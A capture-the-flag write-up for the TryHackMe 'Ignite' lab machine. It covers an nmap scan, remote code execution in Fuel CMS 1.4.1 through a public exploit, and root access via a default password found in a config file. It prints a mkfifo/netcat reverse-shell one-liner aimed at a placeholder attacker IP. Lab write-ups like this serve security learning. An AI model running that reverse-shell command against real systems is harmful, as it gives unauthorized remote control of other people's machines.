TryHackMe: Ignite — Writeup
Today, we will explain how to use a well known CVE to exploit a vulnerable CMS. The machine we use is called Ignite, and is available here.
Reconnaissance
As always, we start with some reconnaissance. Nmap is a tool of choice when it comes to port scanning and services detection.
# Nmap 7.91 scan initiated Wed Jul 7 08:44:03 2021 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/kali/TryHackMe/Ignite/results/scans/_quick_tcp_nmap.txt -oX /home/kali/TryHackMe/Ignite/results/scans/xml/_quick_tcp_nmap.xml 10.10.156.102
Nmap scan report for 10.10.156.102
Host is up, received user-set (0.28s latency).
Scanned at 2021-07-07 08:44:04 EDT for 21s
Not shown: 999 closed ports
Reason: 999 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMSRead data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 7 08:44:25 2021 -- 1 IP address (1 host up) scanned in 21.30 seconds
Nmap only reports one port open: an Apache webserver.
Webserver
This webserver seems to be running Fuel CMS version 1.4. I have never heard of that CMS before. Maybe it has some well known vulnerabilities. We will use searchsploit:
Searchsploit gives us interesting results with 2 exploits allowing Remote Code Execution for CMS Fuel version 1.4.1. Let’s try the first exploit, a python script. I modified it a little so I don’t have to use a proxy.
We then run the script. It asks us for a command to execute.
We open a netcat listener and then send a bash command that will open a reverse shell on our netcat listener. We use the following bash command:
rm /tmp/ykrg;mkfifo /tmp/ykrg;cat /tmp/ykrg|/bin/sh -i 2>&1|nc [attacker-ip] [port] >/tmp/ykrgAnd we obtain a reverse shell as www-data.
Privilege escalation
Enumeration is key on this step. Tools such as linpeas can be useful to find passwords and other juicy information in config files. In our case the /var/www/html/fuel/application/config/database.php gives us a default password for root.
We try to elevate our privileges to root with this password, and it works!
I hope you enjoyed the content! If so, feel free to follow me on Twitter where I share about my cybersecurity journey!
